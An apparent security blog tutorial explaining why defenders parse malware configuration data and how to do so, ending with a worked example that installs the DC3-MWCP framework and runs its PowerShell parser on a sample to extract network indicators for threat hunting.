The majority of threat actors buy and use commodity malware. To tailor this malicious software to their needs, they use malware configuration settings that dictate how it behaves. Parsing this data is an essential skill for any threat hunter or detection engineer, making learning to use a malware configuration parsers vital.
Malware configuration parsing allows you to correlate intrusions, track campaigns, enrich threat hunts, improve incident response, and write better detection rules. It is a skill often overlooked due to its technical requirements, but with malware configuration parsing tools, you can add this game-changing anal skill to your arsenal.
This article will show you how. You will learn why malware configuration parsing is vital for defenders, the different parsing options available, and the challenges you will face. You will also see a practical example of how to parse PowerShell malware. Let’s jump in and get started!
A Brief Guide on Malware Configuration
There are around 5.5 billion malware (malicious software) attacks every year. It is used to gain initial access, move around networks, automatically exploit vulnerabilities, ransom victims, and exfiltrate data. Malware automates a human operator’s actions, making it more efficient, scalable, and less error-prone.
However, to be effective, malware needs to meet specific user needs. It needs to be able to exfiltrate data to a certain network address, install a persistence mechanism in a certain location, or only target certain victims. Malware authors must allow users to fine-tune the commodity malware they sell, which is where malware configuration comes in.
Like any other software, malware can be configured to behave, function, or interact in a certain way using parameters, settings, or a set of rules. You can instruct the malware to communicate with a specific IP address on a specific port at a specific time once it has infected a system without having to build your own custom malware (a resource-intensive process).
Here are some main reasons threat actors will configure the malware they use:
- Adapt to changing circumstances, evade detection, or update its capabilities in response to security measures. This can even be done dynamically with polymorphic malware that alters its behavior over time or in response to environment variables.
- Tailor the malware to their use case, infrastructure, and objective. For instance, changing communication settings, adjusting the payload delivery mechanism, or adding a persistence mechanism.
- Add encryption and obfuscation to hinder analysis. Attackers will often configure malware with their own encryption key to protect it, or the data it is exfiltrating, from detection and analysis.
- Obscure IOCs. Detection rules can be created to pick up default malware configurations, such as mutexes, so attackers will adjust default settings to evade detection.
You may wonder why threat actors don’t just write their own malware. Writing custom malware that can evade modern security controls is a time-intensive and skill-dependent process. Most threat actors choose to buy malware-as-a-service (MaaS) from affiliate programs.
Why Parse Malware Configurations?
So why parse the configuration data in a piece of malware? Simple. To understand it better and the threat actor better.
Parsing the embedded configuration details in a piece of malware plays a crucial role in quickly understanding its behavior and interpreting the threat actor’s objectives. These details allow defenders to hunt for threats, build detections, and group similar intrusions into campaigns to gain insight into an adversary’s capabilities, intentions, and future actions.
Even something as simple as changing the default installation folder or the persistence mechanism can tell you something about the adversary, give you something to hunt for, and allow you to correlate intrusions.
Here are some examples of information you can extract from malware configuration data. You can use this data to hunt using the Indicator Lifecycle, write detection rules, or enrich your intelligence. The Course of Action (CoA) you choose will depend on your intelligence requirements, tools, logging capabilities, and the type of information. For example, hunting for atomic indicators like IP addresses or hashes is better than building a detection rule around them.
Registry values and keys
These are components of the Microsoft Windows registry, a hierarchical database that stores configuration settings and options for the operating system and installed applications. Malware will install persistence mechanisms in this database. Extracting this data can help guide incident response or threat hunting efforts.
Domains, IP addresses, network ports, and user agents
Malware often communicates back to the attacker and has network information coded into it. Extracting this data can help you find additional IOCs to block or hunt for in your environment.
Filenames and file paths
Malware is usually deployed in stages. An initial stage (dropper/loader) will download other components to provide additional functionality and capabilities. The malware will store these additional components somewhere on the victim’s filesystem. Extracting filenames and file paths from the malware configuration details can help you find these installation locations.
Version numbers
Malware variants usually undergo iterations where the author adds or improves their functionality, just like traditional software development. This means samples often contain version numbers that can be parsed and analyzed against other samples or threat intelligence, allowing you to deduce the malware’s capabilities or IOCs.
Commands executed
Malware can be configured to execute specific commands once it infects a machine. Extracting these commands (or fragments of them) from the malware configuration data can allow you to identify other malicious behaviors and even the intent of the malware.
Mutexes
Legitimate software uses mutex objects as a locking mechanism to prevent multiple threads from accessing the same resource. Malware authors use mutexes for the same reason. This creates identifiers in malware samples that you can extract to identify a malware family or variant.
Key Advantages of Parsing Malware Configurations
- Correlate intrusions and help track campaigns: The configuration of malware can be used to correlate separate intrusions into an overarching campaign. By classifying an intrusion into a campaign, defenders can identify other behaviors, IOCs, or targets associated with that campaign.
- Enrich threat hunting: Configuration data can be used to generate threat hunting hypotheses based on malware indicators or behavior. This can guide threat hunters to find malware lurking in their environment undetected or enrich existing threat hunts.
- Improve incident response: Malware configuration data often contains key indicators (IOCs). These can help incident response know what to look for on infected systems, remove persistence mechanisms, and identify when data has been exfiltrated.
- Better detection engineering: Analyzing the behavior of malware through its configuration data allows you to build more robust detections focusing on behavioral patterns and functionality rather than atomic indicators.
Now you know the why, let’s look at the how by exploring tools that allow us to parse malware efficiently.
Using Malware Configuration Parsers
Parsing malware is difficult. You must know how to dive into the binary file and perform reverse engineering to pull out all the embedded configuration data. This requires expert knowledge, mastering complex tools, and is time-intensive. A better option for many of us is to use a malware parser and automate the process.
Malware configuration parsers are tools designed to automatically extract, interpret, and analyze the configuration settings embedded in malware. There is no need to spend time painstakingly dissecting a piece of malware to uncover configuration details. Just find (or build) a parser to match the piece of malware you are investigating, run the tool, and feast on the configuration details it reveals.
Common Features and Capabilities
Malware configuration parsers have several features and capabilities in common. Consider these when looking for one to use or when building your own.
- Configuration and IOC extraction: All malware parsers are designed to extract relevant configuration settings and IOCs, including network communication data, filenames and hashes, encryption keys, and more.
- Decryption and deobfuscation: Many parsers can dynamically decrypt or deobfuscate hidden configuration details, particularly ones that dynamically analyze the malware.
- Adaptability: Some malware config parsers can adapt to different malware families or variants, whereas others are specifically designed to extract configuration settings from one type of malware or even just one variant.
- Behavioral analysis: Malware configuration parsers can be built into larger malware analysis tools like sandbox environments. These tools can automate the dynamic analysis of malware once executed and provide details about its configuration based on how it behaves.
- Integration with other tools: To help streamline your investigations, it can be useful if your parser integrates with other tools. This could be through inbuilt integrations into a SIEM solution and Threat Intelligence Platform (TIP), or custom-built integrations if the tool supports an API and scripting language like Python.
- Automation and scalability: If you plan to analyze large quantities of malware, finding a tool to support volume and automated analysis is useful. Many all-in-one malware analysis solutions support this functionality but for a premium.
- Visualization and reporting: Several malware configuration parsers include visualizations and reporting capabilities to help you understand their findings effectively. This is a nice feature to have but not necessary for investigatory purposes.
A malware configuration parser may not support all these features. That does not make it a bad tool. For instance, one parser may be great at creating visual reports and able to parse configuration data from various malware. Whereas another may be very good at parsing one specific type of malware. It is useful to build up a collection of malware config parsers to use on a case-by-case basis.
Commodity vs. Custom Parsers
You can choose from two types of malware configuration parsers: off-the-shelf commodity parsers or custom parsers that you build yourself.
Commodity Parsers
When first starting out with parsing malware configs, it is useful to try out commodity parsers. These tools often don’t require you to have a deep understanding of system programming or malware analysis. Instead, they are point-and-shoot solutions that only require you to upload a malware sample or run a command line tool.
Many popular malware analysis tools like any.run, Intzer Analyze, and VMRay include malware configuration parsers as part of their all-in-one package. There are also other open-source solutions like MalCfgParser that brute forces malware config details and can be extended using YARA and malware configuration structs.
Custom Parsers
If commodity parsers don’t cut it, you will need to build your own custom parser. You can do this by hand, going through a malware binary, picking out configuration settings, and then coding a tool to do this for you in a reverse engineering suite like Ghidra, IDA Pro, or Binary Ninja. But there is an easier way.
The US Department of Defense (DoD) Cyber Crime Center has created a project called DC3 Malware Configuration Parser (DC3-MWCP). This framework for parsing malware configuration information is designed to make building and sharing malware parsers easier. It is an awesome project that supports individual analysis of singular malware samples and large-scale automated analysis of many samples. I highly recommend starting here when building a custom parser.
The framework also comes with many inbuilt malware configuration parsers that you will see in action later.
Challenges in Parsing Malware Configurations
At this point, you probably recognize the value of malware parsers and are avidly researching tools you can use or even considering building your own! Unfortunately, parsing malware configuration data is not without its challenges. Here are some you will come across.
Anti-Analysis Techniques
Malware authors don’t want analysts poking around at their malware and writing detections for it. They will use various anti-analysis techniques to prevent this, including encryption, obfuscation, sandbox/debugger detection, delays in execution, packing, and more. This makes parsing malware configuration data difficult, often requiring a custom tool to extract data for each malware family or variant.
Volume and Variety
The sheer volume and variety of malware make it difficult to build one malware configuration parser to handle everything. Each malware family or variant will have unique characteristics, target different operating systems, and use different anti-analysis techniques. Creating one tool that can accommodate for all of this diversity is incredibly hard, if not impossible. This is why you see malware configuration parsers designed for specific malware.
A solution to this problem is to use a sandbox environment that executes the malware and analyzes its behavior to deduce its configuration settings. However, malware authors will try to circumvent this with anti-sandbox techniques. There is an ongoing battle between malware analysts and authors to bypass anti-analysis techniques and implement new ones.
Resource Constraints
Parsing malware configuration settings can be very easy or very hard. There is usually no in-between. If there is an existing malware parser for the malware sample you are analyzing, your job is easy; just run the tool against your sample.
On the other hand, if a malware parser does not exist for your sample, much more work is needed. You must analyze or reverse engineer the sample by yourself to extract the data, then code a tool that automates your actions. This is a resource-intensive process, and often you will not have the time or skill to do this.
Ideally, you will have a malware analyst or reverse engineer on your team who can do this for you. But even then, this may not be possible to complete in a satisfactory time scale, depending on the sophistication of the malware.
Case Study: DC3-MWCP
Enough theory. Let’s see a malware configuration parser in action! In this case study, we will use the DC3-MWCP project’s default PowerShell parser to investigate a suspicious PowerShell script we found on a system. Our aim is to provide valuable insights to help our security operations team.
Installation
To begin, you first need to install the DC3-MWCP tool. You can install the tool directly using Python’s PIP package manager with the command pip install mwcp
. Alternatively, you can clone the project’s GitHub repository and then use PIP. For details on how to install Python click here.
# option 1
pip install mwcp
# option 2
git clone https://github.com/Defense-Cyber-Crime-Center/DC3-MWCP.git
pip install ./DC3-MWCP
Now you can move on to the fun part!
Usage
DC3-MWCP comes pre-packaged with several parsers you can use. To see what is available, run the DC3-MWCP command line tool by executing mwcp list
. This lists the available loaded parsers.
Here you can see 11 malware parsers are available out of the box. You can add your own parsers under these names by pre-pending dc3
to its description.
SuperMalware:
description: SuperMalware component
author: acme
parsers:
- dc3:Archive.Zip
- .Dropper
- .Implant
- dc3:Decoy
You may need to add your local binary directory $HOME/.local/bin
to your system’s $PATH
variable if the command above does not work as expected.
To see what else the DC3-MWCP command line tool can do, execute the command mwcp --help
. This brings up the help manual.
Let’s try out the parse
option. This lets us run any available parsers against a malware sample to extract configuration settings. In our investigation, you came across some PowerShell malware that needs to be investigated. This malware has been renamed to sample1.ps1
and can be analyzed with the following command:
mwcp parse PowerShell sample1.ps1
Here you use the default PowerShell
parser. You can see it extracted a URL, protocol, and domain name from the sample. These would have been set as configuration options by the malware user. Extracting them can help in our investigation.
Analyzing Configuration Details
Once you extract configuration settings, you can then move on to analyzing them. At this point, you have some network indicators to hunt for or pivot from. To hunt for these indicators, hop on your organization’s SIEM or EDR tool and run threat hunting queries. For instance, what other systems communicated to this domain in the last week?
If you choose to pivot on this data point, using the indicator lifecycle, you can use a tool like VirusTotal to find other related data points to investigate. Searching for webhook.site
in VirusTotal reveals that it is potentially a malicious domain.
The domain has also popped up in several threat intelligence reports.
The reports indicate adversaries frequently abuse the domain because it is short, inconspicuous, and blends into legitimate network traffic. This malware sample likely belongs to the latest threat intel report, but further investigation is needed to confirm this. A good place to start doing this is the Relations tab in VirusTotal. It provides other indicators you can look for in your environment.
You can now write up a working intelligence report on what you have discovered about this malware sample based on its configuration data. A good tool to do this with is CTI Blueprints, a project from MITRE that makes intelligence reporting easy.
Conclusion
The majority of malware seen today is commodity MaaS sold by cybercriminals. Threat actors buy this malware and configure it for their attacks. Extracting this configuration data allows you to is a vital skill to enrich threat intelligence, guide threat hunts, and build better detections.
However, parsing malware configuration information is difficult. It is time-intensive and requires a great deal of technical skill. An easier option is to use a malware configuration parser like DC3-MWCP. This tool allows you to use inbuilt parsers or build your own using its framework. The case study in this article showcased some of this tool’s capabilities, but I highly recommend exploring this tool further and integrating it into your threat intelligence, threat hunting, and detection engineering processes.
Don’t just track malware. Track malware configuration data to paint a more accurate picture of your adversary!
Frequently Asked Questions
What is Malware Configuration?
Malware can be configured to behave, function, or interact in a certain way. Often malware authors will allow users to configure the malware to suit their use case. This includes adjusting settings like where to exfiltrate data, changing parameters like the default installation folder, or adding rules that guide the malware’s actions, such as looking for a certain sensitive file. Giving users the ability to configure malware allows the authors to sell their malware to a wider audience, turning it into a commodity (Malware-as-a-Service).
What Are Malware Configuration Parsers?
Malware configuration parsers are tools designed to extract, interpret, and analyze the configuration settings embedded in malware. They are used by malware analysts, CTI analysts, and incident responders to uncover the specific instructions, parameters, and details that define the behavior and functionality of the malware. This information allows them to hunt for IOCs in their environment and group similar intrusions (attacks) into campaigns to gain insight into an adversary’s capabilities, intentions, and future actions.
How Can I Use a Malware Configuration Parser?
You can get started using malware configuration parsers right now for free! Head to the Department of Defense (DoD) Cyber Crime Center DC3 Malware Configuration Parser (DC3-MWCP) GitHub page. This project provides a framework for building your own malware configuration parser and includes several built-in parsers to get started with.